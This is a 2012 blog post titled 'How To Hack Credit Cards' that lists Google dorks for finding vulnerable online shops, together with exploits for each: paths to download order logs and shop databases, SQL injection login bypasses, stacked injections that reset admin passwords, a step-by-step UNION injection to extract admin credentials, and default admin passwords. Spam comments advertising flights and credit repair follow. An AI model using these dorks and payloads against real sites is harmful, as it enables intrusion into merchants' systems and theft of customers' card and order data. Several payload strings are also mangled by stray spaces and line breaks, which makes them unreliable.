border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...


Wednesday, June 6, 2012

How To Hack Credit Cards - Dorks+Exploit+Using+Easy Explain

Most of these are outdated but they can still work if you happen to find a vulnerable site:

google dork :--> inurl:"/cart.php?m="
target looks lile :-->
exploit: chage cart.php?m=view to /admin
target whit exploit :-->
Usename : 'or"="
Password : 'or"=

google dork :--> allinurlroddetail.asp?prod=
target looks like :--> (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :-->

google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :-->
exploit :--> ...&template=order.log
target whit exploit :--> http://www.xxxxxxxx.....late=order.log

google dork :--> allinurl: Lobby.asp
target looks like :-->
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :-->

google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
Keyword=&category=5); update tbluser set fldpassword='' where
Keyword=&category=3); update tbluser set fldaccess='1' where
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where

login page: http://xxxxxxx/vpasp/shopadmin.asp

google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :-->
exploit :--> ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
after finding user and pass go to login page:

google dork :--> allinurl:/shopadmin.asp
target looks like :-->
user : 'or'1
pass : 'or'1

8: :--> allinurl:/store/index.cgi/page=
target looks like :-->
exploit :--> ../admin/files/order.log
target whit exploit :--> http://www.xxxxxxx.c....iles/order.log

9:> allinurl:/metacart/
target looks like :-->
exploit :--> /database/metacart.mdb
target whit exploit :-->

10:> allinurl:/DCShop/
target looks like :-->
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> or

11:> allinurl:/shop/category.asp/catid=
target looks like :-->
exploit :--> /admin/dbsetup.asp
target whit exploit :-->
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> (dosent need to be like this)
in db look for access to find pass and user of shop admins.

12:> allinurl:/commercesql/
target looks like :-->
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :-->
target whit exploit admin manager :-->
target whit exploit order.log :-->

13:> allinurl:/eshop/
target looks like :-->
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :-->
after dl the db look at access for user and password

1/ search google: allinurl:"shopdisplayproducts.asp?id=

2/ find error by adding '

--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467

-If you don't see error then change id to cat


3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password

---> 1%20from%20tbluser"having%201=1--sp_password

--->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......

4/ add 2,3,4,5,6.......until you see a nice table

add 2
----> 1,2%20from%20tbluser"having%201=1--sp_password
then 3
----> 1,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ----> 1,2,3,4%20from%20tbluser"having%201=1--sp_password

...5,6,7,8,9.... untill you see a table. (exp:...47)

----> 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
---->see a table.

5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password

---> 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password

6/ Find link admin to login:
try this first:

Didn't work? then u have to find yourself:

add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password

---> ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password

you'll see something like: ( lot of them)


then guess admin link by adding the above data untill you find admin links

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
if you didn't download the Database..
Try this while there is dblocation.

the url will be:
If u see the error message you have to try this :

download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at

inside you should be able to find *** information.
and you should even be able to find the admin username and password for the website.

the admin login page is usually located here

if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are

Username: admin
password: admin
Username: vpasp
password: vpasp


  1. And it was a great experience, you know, to travel the world and compete at a certain level. It teaches you discipline, focus, and certainly keeps you out of trouble.
    Flights to Kathmandu
    Cheap Flights to Kathmandu
    Cheap Air Tickets to Kathmandu

  2. I contacted One Legal Solution because I was constantly being denied when applying for credit. Mr.Mireles assisted me and answered all of my questions during a free consultation. I then decided to move forward and hire One Legal Solution to restore my credit. It was the best investment I have ever made. My Credit Score is now above 700 which gave me the ability to purchase a new tahoe. Thank You One Legal Solution.
    Credit Restoration | Credit Building | Raise Your Fico Score Now


Follow Us


Twitter Delicious Facebook Digg Stumbleupon Favorites More